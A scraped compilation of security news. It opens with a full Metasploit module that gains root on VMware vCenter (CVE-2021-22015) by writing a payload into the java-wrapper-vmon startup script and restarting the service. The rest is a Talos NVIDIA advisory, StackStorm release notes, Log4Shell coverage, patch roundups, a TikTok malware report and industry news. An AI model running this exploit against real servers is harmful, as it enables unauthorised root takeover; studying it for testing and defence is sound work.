This Metasploit module exploits a privilege escalation in vSphere/vCenter due to improper permissions on the /usr/lib/vmware-vmon/java-wrapper-vmon file. It is possible for anyone in the cis group to write to the file, which will execute as root on vmware-vmon service restart or host reboot. This module was successfully tested against VMware VirtualCenter 6.5.0 build-7070488. Vulnerable versions should include vCenter 7.0 before U2c, vCenter 6.7 before U3o, and vCenter 6.5 before U3q.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = ManualRanking  include Msf::Post::Linux::Priv  include Msf::Post::File  include Msf::Exploit::EXE  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'VMware vCenter vScalation Priv Esc',        'Description' => %q{          This module exploits a privilege escalation in vSphere/vCenter due to improper permissions on the          /usr/lib/vmware-vmon/java-wrapper-vmon file. It is possible for anyone in the          cis group to write to the file, which will execute as root on vmware-vmon service          restart or host reboot.          This module was successfully tested against VMware VirtualCenter 6.5.0 build-7070488.          The following versions should be vulnerable:          vCenter 7.0 before U2c          vCenter 6.7 before U3o          vCenter 6.5 before U3q        },        'License' => MSF_LICENSE,        'Author' => [          'h00die', # msf module          'Yuval Lazar' # original PoC, analysis        ],        'Platform' => [ 'linux' ],        'Arch' => [ ARCH_X86, ARCH_X64 ],        'SessionTypes' => [ 'shell', 'meterpreter' ],        'Targets' => [[ 'Auto', {} ]],        'Privileged' => true,        'References' => [          [ 'URL', 'https://pentera.io/blog/vscalation-cve-2021-22015-local-privilege-escalation-in-vmware-vcenter-pentera-labs/' ],          [ 'CVE', '2021-22015' ],          [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0020.html' ]        ],        'DisclosureDate' => '2021-09-21',        'DefaultTarget' => 0,        'DefaultOptions' => {          'WfsDelay' => 1800 # 30min        },        'Notes' => {          'Stability' => [CRASH_SERVICE_DOWN],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS],          'AKA' => ['vScalation']        }      )    )    register_advanced_options [      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])    ]  end  # Simplify pulling the writable directory variable  def base_dir    datastore['WritableDir'].to_s  end  def java_wrapper_vmon    '/usr/lib/vmware-vmon/java-wrapper-vmon'  end  def check    group_owner = cmd_exec("stat -c \"%G\" \"#{java_wrapper_vmon}\"")    if writable?(java_wrapper_vmon) && group_owner == 'cis'      return CheckCode::Appears("#{java_wrapper_vmon} is writable and owned by cis group")    end    CheckCode::Safe("#{java_wrapper_vmon} not owned by 'cis' group (owned by '#{group_owner}'), or not writable")  end  def exploit    # Check if we're already root    if is_root? && !datastore['ForceExploit']      fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'    end    # Make sure we can write our exploit and payload to the local system    unless writable? base_dir      fail_with Failure::BadConfig, "#{base_dir} is not writable"    end    # backup the original file    @backup = read_file(java_wrapper_vmon)    path = store_loot(      'java-wrapper-vmon.text',      'text/plain',      rhost,      @backup,      'java-wrapper-vmon.text'    )    print_good("Original #{java_wrapper_vmon} backed up to #{path}")    # Upload payload executable    payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"    print_status("Writing payload to #{payload_path}")    upload_and_chmodx payload_path, generate_payload_exe    register_files_for_cleanup payload_path    # write trojaned file    # we want to write our payload towards the top to ensure it gets run    # writing it at the bottom of the file results in the payload not being run    print_status("Writing trojaned #{java_wrapper_vmon}")    write_file(java_wrapper_vmon, @backup.gsub('#!/bin/sh', "#!/bin/sh\n#{payload_path} &\n"))    # try to restart the service    print_status('Attempting to restart vmware-vmon service (systemctl restart vmware-vmon.service)')    service_restart = cmd_exec('systemctl restart vmware-vmon.service')    # one error i'm seeing when using vsphere-client is: Failed to restart vmware-vmon.service: The name org.freedesktop.PolicyKit1 was not provided by any .service files    if service_restart.downcase.include?('access denied') || service_restart.downcase.include?('failed')      print_bad('vmware-vmon service needs to be restarted, or host rebooted to obtain shell.')    end    print_status("Waiting #{datastore['WfsDelay']} seconds for shell")  end  def cleanup    unless @backup.nil?      print_status("Replacing trojaned #{java_wrapper_vmon} with original")      write_file(java_wrapper_vmon, @backup)    end    super  endend

VMware vCenter vScalation Privilege Escalation

Piotr Bania of Cisco Talos discovered these vulnerabilities.
Cisco Talos recently discovered two memory corruption vulnerabilities in shader functionality of an NVIDIA driver.
NVIDIA Graphics drivers are software for NVIDIA Graphics GPU installed on the PC. They are used to communicate between the operating system and the GPU device. This

Tuesday, December 6, 2022 11:12

_Piotr Bania of Cisco Talos discovered these vulnerabilities._

Cisco Talos recently discovered two memory corruption vulnerabilities in shader functionality of an NVIDIA driver.

NVIDIA Graphics drivers are software for NVIDIA Graphics GPU installed on the PC. They are used to communicate between the operating system and the GPU device. This software is required in most cases for the hardware device to function properly.

Two exploitable memory corruption vulnerabilities exist in the NVIDIA graphics driver: TALOS-2022-1603 (CVE-2022-34671) and TALOS-2022-1604 (CVE-2022-34671). An attacker can use arbitrary code execution to trigger these vulnerabilities. These vulnerabilities could also potentially be triggered from guest machines running virtualization environments (ie. VMware, qemu, VirtualBox, etc.) in order to perform guest-to-host escape.

Cisco Talos worked with NVIDIA to ensure that these issues were resolved and an update is available for affected customers, all in adherence to Cisco’s vulnerability disclosure policy.

Users are encouraged to update this affected product as soon as possible: NVIDIA D3D10 Driver, Version 516.94 , 31.0.15.1694. Talos tested and confirmed this version of the NVIDIA could be exploited by these vulnerabilities.

The following Snort rules will detect exploitation attempts against these vulnerabilities: 60606-60607 and 60611-60612. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Vulnerability Spotlight: NVIDIA driver memory corruption vulnerabilities discovered

Cross-site scripting (XSS) vulnerability in the Web UI of StackStorm versions prior to 3.8.0 allowed logged in users with write access to pack rules to inject arbitrary script or HTML that may be executed in Web UI for other logged in users.

**Dec 02, 2022**

_By Carlos (@nzlosh) with assistance from Ankur Singh (@rush-skills)_

StackStorm v3.8.0 has been released. It comes with two critical security patches, new core features and enhancements, web ui updates, and lots of bug fixes.

**CVE-2022-43706 - Web UI XSS Security Fix**

Cross-site scripting (XSS) vulnerability in the Web UI of StackStorm versions prior to 3.8.0 allowed logged in users with write access to pack rules to inject arbitrary script or HTML that may be executed in Web UI for other logged in users.

This major issue was reported by the independent security researcher Mohamed Elgllad and fixed in v3.8.0. We’d like to thank Mohamed for his open source security contribution!

We highly recommend our users update their StackStorm systems.

**CVE-2022-44009 - K/V RBAC Security Fix**

Improper access control in Key-Value RBAC in StackStorm version 3.7.0 didn't check the permissions in Jinja filters, allowing attackers to access K/V pairs of other users, potentially leading to the exposure of sensitive Information. This is now fixed, so please update to v3.8.0 if you started using RBAC for K/V in v3.7.0.

The issue was reported by Guilherme Murad Pim, one of the StackStorm community members and we appreciate the time and effort finding and reporting issues like that.  
Guilherme is also working on contributing the SSO/SAML support in the next StackStorm version, - more on that below.

**Workflow engine graceful shutdown**

StackStorm’s Workflow engine can now handle shutdown events more gracefully thanks to the contribution by @khushboobhatia01 from VMware.

Two new configurations has been added to st2.conf in the [workflow_engine] section to have more granular control:

*   exit_still_active_check = 300  
    How long to wait for process (in seconds) to exit after receiving shutdown signal.
*   still_active_check_interval = 2  
    How long to wait for process (in seconds) to exit after receiving shutdown signal.

**Web UI Updates**

   

New Auto-Save Workflow, Hotkey Shortcuts, Support for the Rule Search Criteria and Security fix for XSS were contributed by @Bitovi, a StackStorm partner. Check out a dedicated overview with screenshots and videos: Web UI Updates in v3.8.0.

Outside of that, new enhancement that temporarily disable web buttons in forms after onClick to avoid accidental double-clicks was added by Parth Shandilya from @CERN in stackstorm/st2web#977 to make the Web UI experience even better!

**Purging old tokens in Garbagecollector**

Amanda McGuinness from @intive, a StackStorm partner, expanded the garbage collector to clean up more resources. The GC will now purge expired old tokens, which were previously excluded from the purge process and could end up consuming a large amount of space over time.

You can control the new behavior via st2.conf settings:

								[garbagecollector]  
								# Tokens that expired over this value (days) will be automatically deleted.  
								# Defaults to None (disabled).  
								tokens_ttl = None  
							

See the garbagecollector purge documentation for more details.

**Action Output Schema changes****Breaking change!**

If you have [system].validate_output_schema = True (disabled by default) in st2.conf AND you have added output_schema to any of your packs, then you must update your action metadata. Any legacy schemas, like all invalid schemas, will be used for validation; they will be silently ignored. However, for security, secret masking based on the legacy schema is still supported.

Secret masking is one of the primary purposes of output validation. But, the legacy schema format assumed that it was describing the properties of an object; that meant that only object properties could be masked, not the entire output. With v3.8.0, output_schema is much more versatile, removing this restriction on what can be masked.

In v3.8.0, output_schema must be a full jsonschema. With this change the entire output can be masked as output_schema can describe all basic types: object, list, bool, int, etc. Feel free to validate and/or mask the entire action output, or particular elements of lists, or properties of objects.

To migrate an action's legacy output\_schema to be a full jsonschema, you'll need to add a top-level type, properties, and additionalProperties to it. See v3.8.0 migration notes for detailed instructions how to update.

Contributed by Jacob Floyd (@cognifloyd) @Copart IT.

**Other significant changes**

*   Support to communicate with Redis using TLS encryption.
*   Process patternProperties and additionalItems defined in pack schema.
*   Improved nested array support in schemas.
*   HTTP\_PROXY/HTTPS\_PROXY environment variables are checked and used by st2client.
*   Date/time module switched from udatetime to ciso8601.
*   Removed deprecated st2exporter code from StackStorm.
*   st2chatops hubot-slack adapter updated to 4.10.0 to use the new Slack API by default.

And more than **30** other bug fixes and enhancements. Read the full v3.8.0 changelog here.

**Coming up in the next release**

There’s a massive amount of work ongoing by community to add SSO/SAML support to StackStorm across the platform components: stackstorm/st2#5664, stackstorm/st2web#983, stackstorm/st2-auth-backend-sso-saml2.  
We’re looking for more testing and review from our community to get that major feature included in the next v3.9.0. If you’re interested, - please take a look at the PRs above, try it, and provide feedback. The work in progress documentation for the new feature is available at stackstorm/st2docs#1146 and there’s even a docker environment to test it.

We are also working on improving the developer experience and our build/test/release process with Pants, thanks to Jacob Floyd (@cognifloyd). Some Pants features we are most looking forward to include: requirements lockfiles; reliable fine grained caching of results from test, lint, format and other processes; and amazing error messages that guide contributors (both new and old) about how to resolve various dev issues. We hope this will lower the barrier to entry for new contributors, and streamline the StackStorm packaging release process.

**Special Thanks**

StackStorm releases are not possible without the Community of contributors and supporters, as well as release team who dedicated a lot of time to get the v3.8.0 out with assistance of TSC maintainers. We want to thank everyone: security researchers who reported issues, StackStorm partners who patched them, release managers who did the heavy-lifting with release automation, contributors for their PRs, as well as our adopters for reporting bugs, asking questions and being an active part of StackStorm open-source Community.

The v3.8.0 release was brought by the release managers Carlos with assistance of Ankur Singh @CERN.  
Special thanks: @m4dcoder, Amanda McGuinness from @intive partner, Jacob Floyd, @dylan-bitovi with @Jappzy, with @WestonVincze, with @cded and Eugen from @Bitovi partner, @bharath-orchestral from @Orchestral partner, Bradley Bishop from @Encore partner, Khushboo Bhatia @VMware, @ParthS007 @CERN, Mark Mercado @DigitalOcean, @LiamRiddell, @luislobo, @S-T-A-R-L-O-R-D, @wfgydbu.

As usual, you can join the StackStorm Open Source Community in Slack, subscribe to StackStorm Twitter and LinkedIn to not miss the upcoming project news and updates!

CVE-2022-43706: StackStorm v3.8.0 Released

Though there have been fewer than expected publicly reported attacks involving the vulnerability, nearly three-quarters of organizations remain exposed to it.

The Log4j vulnerability continues to present a major threat to enterprise organizations one year after the Apache Software Foundation disclosed it last November — even though the number of publicly disclosed attacks targeting the flaw itself has been less than many might have initially expected.

A high percentage of systems still remain unpatched against the flaw, and organizations face challenges in finding and remediating the issue and then preventing the flaw from being reintroduced into the environment, security researchers say.

"The fact that Log4j is used in \[nearly\] 64% of Java applications and only 50% of those have updated to a fully fixed version means attackers will continue to target it," says David Lindner, CISO at Contrast Security. "At least for now, attackers continue to have a field day in finding paths to exploit through Log4j."

**Multiple Attacks But Fewer Than Expected**

The Log4j flaw (CVE-2021-44228), commonly referred to as Log4Shell, exists in Log4j's Java Naming and Directory Interface (JNDI) function for data storage and retrieval. It gives remote attackers a trivially easy way to take control of vulnerable systems — a problem given that Log4J is used in virtually every Java application environment. Security researchers consider it as one of the most significant vulnerabilities in recent years because of its prevalence and the relative ease with which attackers can exploit it.

Over the past year, there have been numerous reports about threat actors targeting the flaw as a way to gain initial access into a target network. Many of these attacks have involved nation-state-backed advanced persistent threat (APT) groups from China, North Korea, Iran, and other countries. In November, for instance, the US Cybersecurity and Infrastructure Security Agency (CISA) warned about an Iran-government-backed APT group exploiting the Log4j vulnerability in an unpatched VMware Horizon server to deploy cryptomining software and credential harvesters on a federal network.

The warning was similar to one from Fortinet in March about Chinese threat actor Deep Panda using the identical vector to deploy a backdoor on target systems and another from Ahn Labs about North Korea's Lazarus Group distributing its own backdoor the same way. Others such as Microsoft have also reported observing state actors such as Iran's Phosphorous group and China's Hafnium threat actor using Log4 to drop reverse shells on infected systems.

Despite such reports — and several others about financially motivated cybercrime groups targeting Log4j — the actual number of publicly reported compromises involving Log4 has remained comparatively low, especially when compared to incidents involving Exchange Server vulnerabilities like ProxyLogon and ProxyShell. Bob Huber, chief security officer at Tenable, says the scale and scope of reported attacks have been surprisingly lower than expected, considering the simplicity of the vulnerability and the attack path. "Only recently have we seen some significant evidence of targeting, as noted by recent nation state activity from CISA," Huber says.

**Undiminished Threat**

However, that does not mean the threat from Log4j has diminished over the past year, security researchers note.

For one thing, a large percentage of organizations remain as vulnerable to the threat as they were a year ago. An analysis of telemetry related to the bug that Tenable recently conducted showed 72% of organizations were vulnerable to Log4j, as of Oct. 1. Tenable found that 28% of organizations globally have fully remediated against the bug. But Tenable found that organizations which had remediated their systems often encountered Log4j again and again as they added new assets to their environments.

In many instances — 29%, in fact — servers, Web applications, containers, and other assets became vulnerable to Log4j soon after initial remediation.

"Assuming organizations build the fix into the left side of the equation — during the build pipeline for software — rates of reintroduction should diminish," Huber says. "Much of the rate of reintroduction and change depends greatly on an organization's software release cycle."

Also, despite almost ubiquitous awareness of the flaw within the cybersecurity community, vulnerable versions of Log4j remain vexingly hard to find at many organizations because of how applications use it. Some applications might use the open source logging component as a direct dependency in their applications, and in other instances an application might use Log4j as a transitive dependency — or a dependency of another dependency, says Brian Fox, CTO at Sonatype.

"Since transitive dependencies are introduced from your direct dependency choices, they may not always be known or directly visible to your developers," Fox says.

In many cases, when the Apache Foundation first disclosed Log4Shell, companies had to send out thousands of internal emails, collect results in spreadsheets, and recursively scan file systems, Fox says. "This cost companies valuable time and resources to patch the component and prolonged the magnitude of the vulnerability's malicious effect," he says.

Data from the Maven Central Java repository that Sonatype maintains shows that 35% of Log4 downloads currently continue to be of vulnerable versions of the software. "Many companies are still trying to build their software inventory before they can even begin a response and are unaware of the implications of transitive dependencies," Fox says.

Because of all of the issues, the US Department of Homeland Security review board earlier this year concluded that Log4 is an endemic security risk that organizations will need to contend with for years. Members of the board assessed that vulnerable instances of Log4j will remain in systems for many years to come and put organizations at risk of attack for the foreseeable future.

**The One Positive Outcome**

Security researchers tracking the bug say that the positive fallout from Log4j is the heightened attention it has drawn to practices such as software composition analysis and software bill of materials (SBOM). The challenges that organizations have faced just determining whether they are vulnerable or where the vulnerability might exist in their environment has fostered a better understanding of the need for visibility into all the components in their codebase — especially those from open source and third-party sources.

"The investigation into the Log4J issue has reaffirmed the need for better software supply chain attestation in addition to SBOMs that keep up with the speed of DevOps," says Matthew Rose, CISO at ReversingLabs. "Application security and architecture teams have realized that just looking for risk in parts of the application like source code, APIs, or open source packages is not enough. They now realize that a complete understanding of the application's architecture is just as important as finding SQLI or cross-site scripting bugs (XSS)," he says.

One Year After Log4Shell, Most Firms Are Still Exposed to Attack

New functionality further reduces the risk of lateral movement.

**REDWOOD CITY, Calif., Nov. 30, 2022 /PRNewswire/** — Delinea, a leading provider of Privileged Access Management (PAM) solutions for seamless security, today announced the latest release of Cloud Suite, its solution that controls privileged access and authorization for on-premises and cloud servers. A new granular privilege elevation workflow allows users to request elevated privileges to execute specific commands or command sets that require full administrator rights. New functionality also enables administrators to assign privileged roles on Linux servers with more detailed control, helping to ensure that productivity does not compromise security.

According to the 2022 VMWare Global Incident Response Threat Report, lateral movements are detected in 25% of all attacks, with cybercriminals abusing tools such as host scripts, file storage, and synchronization. Cloud Suite empowers customers with robust capabilities that help contain the impact of a potential breach and greatly reduce the likelihood of lateral movements. For example, IT teams can consolidate identities across enterprise directories and cloud providers including Active Directory, Azure AD, AWS, and Google Cloud, simplify authentication, and apply granular authorization controls to implement least privilege best practices, enhancing security postures.

**More granular privilege elevation automation**

Available now in public preview, privilege elevation workflows give users a way to request access to commands that require elevated privileges when they don't have that access, and they are enabled for one, multiple, or all commands on the system. The new workflow allows users to request elevated privileges only for specific commands or command sets without having to request administrator access to all commands every time. This functionality supports the principle of just-in-time and just-enough access at a more granular level.

**Finer controls on Linux servers**

The Cloud Suite update also includes profile mapping for Unix roles that ensures privileged access controls can be managed as sets of enrolled Linux servers rather than globally, for a more targeted privilege authorization. This feature helps minimize the risk of over-privileged roles and promotes least privilege best practices.

"With this release of Cloud Suite, we are making it easier for our customers to apply finer, more granular controls for privileged access to their on-premise and public cloud servers which house their critical data," said Phil Calvin, Chief Product Officer at Delinea.

Additional updates in this release include added group privileges on Windows servers and support for the latest distributions of AlmaLinux and Rocky Linux.

Organizations can try the latest version of Cloud Suite for free at https://delinea.com/products/cloud-suite.

**About Delinea  
**Delinea is a leading provider of Privileged Access Management (PAM) solutions that make security seamless for the modern, hybrid enterprise. Our solutions empower organizations to secure critical data, devices, code, and cloud infrastructure to help reduce risk, ensure compliance, and simplify security. Delinea removes complexity and defines the boundaries of access for thousands of customers worldwide. Our customers range from small businesses to the world's largest financial institutions, intelligence agencies, and critical infrastructure companies. Learn more about Delinea on LinkedIn, Twitter, and YouTube.

© Delinea Inc. (formerly Centrify Corporation) 2022. Delinea™ is a trademark of Delinea Inc. All other trademarks are property of their respective owners.

SOURCE: Delinea

Delinea Introduces Granular Privileged Access Controls on Servers

Plus: Major patches dropped this month for Chrome, Firefox, VMware, Cisco, Citrix, and SAP.

November saw the release of patches from the likes of Apple’s iOS, Google Chrome, Firefox, and Microsoft Windows to fix multiple security vulnerabilities. Some of these issues are pretty severe, and several have already been exploited by attackers. 

Here’s what you need to know about all the important updates released in the past month.

Apple iOS and iPadOS 16.1.1

Apple has released iOS and iPadOS 16.1.1, which the iPhone maker recommends all users apply. The patch fixes two security vulnerabilities—and given the speed of the release, you can assume they are pretty serious. 

Tracked as CVE-2022-40303 and CVE-2022-40304, the two flaws in the libxml2 software library could allow an attacker to execute code remotely, according to Apple’s support page. The issues were both reported by security researchers working for Google’s Project Zero. 

For Mac users, the flaws were addressed by macOS Ventura 13.0.1.

The good news is, it’s believed neither vulnerability has been exploited by attackers, but it’s still a good idea to apply the update as soon as possible. 

Microsoft Windows

Microsoft’s November Patch Tuesday was another big release, seeing the Windows maker fix 68 vulnerabilities, four of which were zero days. 

Tracked as CVE-2022-41073, the first is a Windows print spooler elevation of privilege vulnerability that could allow a cybercriminal to gain system privileges. Meanwhile, CVE-2022-41125 is a Windows Cryptographic Next Generation key isolation issue that could allow an adversary to escalate privileges and gain control of the system. CVE-2022-41128 is a Windows scripting language vulnerability that could result in remote code execution. Lastly, CVE-2022-41091 is a vulnerability in Microsoft’s Mark of the Web security feature.

Google Android

More big updates for users of Google’s Android devices have arrived in November, with Google issuing patches for multiple vulnerabilities, some of which are serious. At the top of the list is a high-severity vulnerability in the Framework component that could lead to local escalation of privilege, Google said in a security advisory.

The patches in November include two Google Play system updates for issues impacting the Media Framework components (CVE-2022-2209) and WiFi (CVE-2022-20463). Google also fixed five issues affecting its Pixel devices.

The Android updates have started to roll out to Samsung devices, including third- and fourth-generation Galaxy foldables. You can check for the update in your Settings. 

Google Chrome 

The world’s most popular browser continues to be a major target for attackers, with Google this month fixing its eighth zero-day vulnerability this year. 

The vulnerability, tracked as CVE-2022-4135, is a heap buffer overflow in GPU reported by Clement Lecigne, a researcher in Google's own threat analysis group. Google said it “is aware that an exploit for CVE-2022-4135 exists in the wild.”

Earlier in the month, Google issued an update to fix 10 Chrome vulnerabilities, six of which are rated as high-severity. These include four use-after-free bugs: CVE-2022-3885, CVE-2022-3886, CVE-2022-3887, and CVE-2022-3888. Meanwhile, CVE-2022-3889 is a “type confusion” issue in V8, and CVE-2022-3890 is a heap buffer overflow in Crashpad. 

Mozilla Firefox

November was also a big month for Google Chrome competitor Firefox. Mozilla has issued Firefox 107, fixing 19 security vulnerabilities, eight of which are marked as having a high impact. 

One of the most important patches is for CVE-2022-45404, a full-screen notification bypass that could allow an attacker to cause a window to go full-screen without the user seeing the notification prompt. This could result in spoofing attacks. Meanwhile, several use-after-free bugs could lead to an exploitable crash, and one flaw could be exploited to run arbitrary code.

VMWare

Software maker VMWare has released security fixes for multiple security vulnerabilities in its VMware Workspace ONE Assist, three of which have a CVSSv3 base score of 9.8. The first, CVE-2022-31685, is an authentication bypass vulnerability. “A malicious actor with network access to Workspace ONE Assist may be able to obtain administrative access without the need to authenticate to the application,” VMWare warned in an advisory.

A broken authentication method vulnerability tracked as CVE-2022-31686 could enable a malicious actor with network access to obtain admin access without the need to authenticate.

Drop What You're Doing and Update iOS, Android, and Windows

By Waqas
The Invisible Body Challenge has over 27 million views to date, making the trend extremely popular.
This is a post from HackRead.com Read the original post: TikTok Invisible Body Challenge Trend Abused to Drop Malware

The newest trend on TikTok, the Invisible Body Challenge, is being abused by cybercriminals to spread WASP info-stealing malware. This malware is capable of stealing a trove of data from a targeted device including cryptocurrency wallets, files, **Discord login credentials**, payment card data, passwords, etc.

**What is TikTok’s Invisible Body Challenge**

The Invisible Body Challenge on TikTok features a filter that acts as a green screen, and your skin tone matches the background. The result is that only your body is rendered, and clothing is visible. The **#invisiblefilter** tag on TikTok has over 27 million views to date, making the trend extremely popular.

Screengrab: Hackread.com

The Invisible Body Challenge is similar to TikTok’s Silhouette Challenge, in which users have to dance to the background while attempting to show off their curves in red lights.

Following the popularity of the Silhouette Challenge, many questioned whether it was possible to remove the filter from videos and see the original clip without the filter. Simply put: If it was possible to see the person’s NSFW clips.

Many are wondering the same thing in the Invisible Body challenge. However, since cybercriminals are a step ahead, a threat actor is claiming to offer “Unfilter,” a malicious software developed to supposedly remove the TikTok filter and let users see the video creator without any clothing.

Once the software is installed on a device, it starts sending the victim’s information to a remote server accessible to cybercriminals.

Silhouette Challenge (left) -The Invisible Body Challenge – Screengrab: Hackread.com

**Growing Popularity of The “Unfilter” Software**

In a Medium **blog post**, Guy Nachshon of Checkmarx stated that the attack is ongoing. Additionally, the threat actors behind the malware scam have created a Discord server where they claim to demonstrate how to use the “Unfilter” software.

What’s worse, the demo videos have received millions of views, while the server has been joined by a whopping 30,000 people, and the number is growing.

**TikTok and Malware**

TikTok has over one billion registered users, and the number is expected to reach 1.8 billion by the end of 2022. These stats not only make TikTok a social network giant, but also a lucrative target for cybercriminals.

**In September 2020**, In September 2020, TikTok users with followers exceeding 350,000 were found to be promoting adware applications through the platform. In the case of the Invisible Body Challenge, two TikTok users, reportedly @learncyber and @kodibtc, published videos on TikTok to promote the malicious Unfilter software.

What’s shocking is that these videos also contained the direct invite link to the Discord server set up by the scammers. At the time of writing, both accounts had been removed from TikTok.

Videos published by TikTokers to spread the invite link (Image credit: Checkmarx)

In a comment to Hackread.com, **Rick McElroy**, Principal Cybersecurity Strategist at VMware said that,

“Given the user base of TikTok, this type of activity is not shocking.” “This reminds me of the aging app that many people used and the data wound up in Russia,” added Rick.

Rick also warned that users especially the youth should not trust third-party apps and should be aware of how much access TikTok has to their data and mobile device based on their end-user license agreement (EULA) and make smart choices when it comes to privacy and security.”

**TikTok Users Beware!**

The best defense against such scams is common sense. However, since the attack is ongoing, TikTokers are urged to be on the lookout and keep their app up-to-date with the latest security updates. This will help ensure that any vulnerabilities in the system have been patched so that they no longer pose a threat to users.

Nevertheless, be aware of suspicious links or messages sent through direct messages or group chats; malware is typically spread through these types of communication channels. It’s best to avoid clicking on any suspicious links and never download files that you don’t trust or recognize as coming from a trusted source.

1.  **US Military Bans TikTok over privacy concerns**
2.  **TikTok vulnerability allowed hackers to send SMS with malware**
3.  **Flaw exploited to post fake COVID-19** **clips** **from TikTok accounts**
4.  **New smishing scam spreads fake TikTok App loaded with malware**
5.  **TikTok’s In-App Browser Can Monitor Your Activity on External Websites**

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

TikTok Invisible Body Challenge Trend Abused to Drop Malware

VMware Tools for Windows (12.x.y prior to 12.1.5, 11.x.y and 10.x.y) contains a denial-of-service vulnerability in the VM3DMP driver. A malicious actor with local user privileges in the Windows guest OS, where VMware Tools is installed, can trigger a PANIC in the VM3DMP driver leading to a denial-of-service condition in the Windows guest OS.

Advisory ID: VMSA-2022-0029

CVSSv3 Range: 3.3

Issue Date: 2022-11-29

Updated On: 2022-11-29 (Initial Advisory)

CVE(s): CVE-2022-31693

Synopsis: VMware Tools for Windows update addresses a denial-of-service vulnerability (CVE-2021-31693)

****1\. Impacted Products****

*   VMware Tools for Windows

****2\. Introduction****

A denial-of-service vulnerability in VMware Tools for Windows was privately reported to VMware. Updates are available to remediate this vulnerability in affected VMware products.

****3\. VMware Tools for Windows update addresses a denial-of-service vulnerability (CVE-2021-31693)****

VMware Tools for Windows contains a denial-of-service vulnerability in the VM3DMP driver. VMware has evaluated the severity of this issue to be in the Low Severity Range with a maximum CVSSv3 base score of 3.3.

A malicious actor with local user privileges in the Windows guest OS, where VMware Tools is installed, can trigger a PANIC in the VM3DMP driver leading to a denial-of-service condition in the Windows guest OS.

To remediate CVE-2022-31693 apply the patches listed in the 'Fixed Version' column of the 'Response Matrix' found below.

VMware would like to thank Sergey Kornienko and Wei Lei of PixiePoint Security for reporting this vulnerability to us.

Product

Version

Running On

CVE Identifier

CVSSv3

Severity

Fixed Version

Workarounds

Additional Documentation

VMware Tools for Windows

12.x.y, 11.x.y and 10.x.y

Windows

CVE-2022-31693

3.3

low

12.1.5

None

None

****4\. References****

****5\. Change Log****

**2022-11-29 VMSA-2022-0029  
**Initial security advisory.

****6\. Contact****

CVE-2021-31693: VMSA-2022-0029

Financing and acquisitions are trending toward smaller deals, which means fewer high-valuation purchases and funding, but likely fewer post-merger layoffs as well.

As the US economy has tightened, the venture capital and acquisition landscape has quickly shifted to become a buyers' market, with startups failing to command the high valuations that were common in past years.

While the sheer number of financing deals is on track to match the more than 1,000 cybersecurity-related investments announced in 2021, the value of those deals has dropped by more than a quarter, according to data from cybersecurity-focused advisory firm Momentum Cyber. The value of purchased companies is also on track to drop by a quarter in 2022, although the absolute number of acquisitions will only drop by about 8%.

The leaner times for startups and their venture-capital backers come as the private sector is cutting costs and refocusing on the most profitable lines of business to ready themselves for a possible recession, says Eric McAlpine, a managing partner at Momentum Cyber.

"We have already seen larger venture-backed companies consolidate significantly to cut costs and refocus on profitability," he says. "Strategic acquirers often have a tough time justifying new acquisitions to their board and taking on companies with new employees in a time where they are already cutting resources and headcount internally."

The worry of a downturn has spread across industries. The majority of companies — 83% — are concerned about a recession coming in 2023, with half of organizations taking concrete steps to prepare for an economic slow down, according to Spiceworks Ziff Davis's "2023 State of IT" report. Three-quarters of businesses are planning to reduce the number of security vendors they use, a significant move toward consolidation from two years ago when 29% aimed to reduce their vendor count.

    

Source: Momentum Cyber

As the business landscape changes, so, too, are companies changing the way they operate. The vast majority of firms — 83% — are placing a greater focus on digital capabilities and operations, according to a survey of CEOs conducted by business intelligence firm Gartner. The analyst firm stressed in a March 2022 advisory that such efforts require cybersecurity teams to adapt and take an integrated role in protecting and enabling the business.

Companies' security teams should "transform the security function into a true business-enabling capability by shifting away from risk-averse, control-driven security operating models toward a more agile, advisory-centric way of delivering security services," Gartner stated.

**Smaller Companies, Smaller Investments, Fewer Layoffs**

Venture money is currently following these trends. Overall, the era of big valuations for newcomers has come to "a standstill," says Momentum Cyber's McAlpine, who sees founders not receiving the same high valuations compared with the recent past, leaving many to hold off on being acquired in the current market. 

There are some exceptions, such as Broadcom's massive deal to acquire VMware — a deal valued at $69 billion. And October saw a surge in deal-making, with two large acquisitions — KnowBe4 and ForgeRock — by private equity firms. But those were outliers, with the number of deals reaching a low point in September, according to McAlpine. Overall, smaller and more specialized firms will make up the vast majority of acquisition targets in the near future, he says. 

So far, in 2022, the average (mean) financing deal amounted to $21 million, down from $28 million in 2021. , and the average acquisition price was $21 million (after dropping the deal for VMware), also down from $28 million.

The good news? Employee layoffs will not necessarily be part of the post-merger landscape, McAlpine says. Typically, general business and administration departments represent most of the duplication between merged companies, leading to cuts in employees in those departments, while the engineering and development teams at startups are sought after for their expertise, he says.

"Employee cuts aren't very common after a merger, even in a down market," McAlpine says. "Many smaller firms and startups are lean to begin with, and their employees are typically viewed as a valuable part of the acquisition."

**No Recession in cybersecurity?**

The good news for cybersecurity companies is that the business demand for products and services is not going away anytime soon, and there are signs that the sector will continue to grow — albeit much more slowly than prior years. 

Slightly more than half of companies (51%), for example, expect to increase their IT budgets, and only about 40% of those attribute the increases to inflation, according to Spiceworks Ziff Davis's "2023 State of IT" report. The Bureau of Labor Statistics currently pegs inflation for end-user prices at approximately 9% year-over-year, but the average IT spending is expected to grow by 13% in 2023 compared with the prior year, says Peter Tsai, head of technology insights at Spiceworks Ziff Davis. 

Companies are updating outdated infrastructure, increasing their focus on IT projects like digital transformation, and adding employees to critical areas — all of which represents cybersecurity risk, which requires increased spending on defenses.

"Both the size of the overall tech spending pie was expected to increase, in addition to the security slice of the pie getting a bit larger," Tsai says. "Inflation will certainly be a factor influencing many 2023 budget increases, but it won't be the top reason driving budget growth."

Cybersecurity Consolidation Continues, Even as Valuations Stall

